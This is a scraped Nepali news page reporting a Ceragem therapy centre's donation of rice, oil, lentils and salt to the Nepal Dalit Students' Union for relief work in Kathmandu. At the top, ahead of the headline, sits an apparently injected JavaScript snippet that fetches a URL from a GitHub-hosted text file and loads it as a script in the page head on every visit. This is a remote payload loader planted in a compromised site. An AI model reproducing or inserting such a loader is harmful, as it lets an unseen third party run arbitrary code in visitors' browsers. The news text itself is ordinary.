;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सेराजीमद्वारा नेपाल दलित बिधार्थी संघको अभियान सफल पार्न राहात सामग्री सहयोग – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सेराजीमद्वारा नेपाल दलित बिधार्थी संघको अभियान सफल पार्न राहात सामग्री सहयोग
जुनेली बिशेष

सेराजीमद्वारा नेपाल दलित बिधार्थी संघको अभियान सफल पार्न राहात सामग्री सहयोग

जुनेली न्युज , काठमाडौँ | नेपाल दलित बिधार्थी संघको राहात वितरण निरन्तर अभियानमा रही रहदा गोकर्नेश्वोर नगरपालिका वडा ५ मा रहेको जोरपाटी सेराजेम (थेरापी) सेन्टरकी प्रमुख बाबु राजा श्रेष्ठ ज्यूले संघलाई राहात बाड्नको लागि खाद्यान्न हस्तान्तरण गरेकी हुन्।
सेराजेम ले  चामल,तेल,दाल,नुन सहितको राहात सामग्री संघका अध्यक्ष राजु सुनारको हातमा हस्तान्तरण गरेको थियो। सुनारले  बाबु राजा श्रेष्ठ ज्यू र सेराजीमको सम्पूर्ण परिवारलाई विशेष धन्यवाद दिए।

फेसबुक प्रतिक्रियाहरु